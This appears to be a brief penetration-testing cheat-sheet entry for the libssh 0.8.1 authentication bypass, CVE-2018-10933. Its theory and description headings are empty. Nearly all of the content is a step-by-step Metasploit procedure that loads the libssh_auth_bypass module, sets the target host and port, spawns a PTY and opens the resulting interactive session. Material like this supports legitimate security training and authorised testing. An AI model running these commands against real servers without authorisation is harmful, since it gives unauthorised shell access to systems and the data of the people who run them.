libssh 0.8.1 - CVE 2018-10933
Theory
Description
Practical
Metasploit
msfconsole -q
use auxiliary/scanner/ssh/libssh_auth_bypass
set RHOSTS <IP>
set RPORT <ssh port>
set SPAWN_PTY true
run
# Interact with the session
sessions
sessions -i <session number>FOR FURTHER READING
Last updated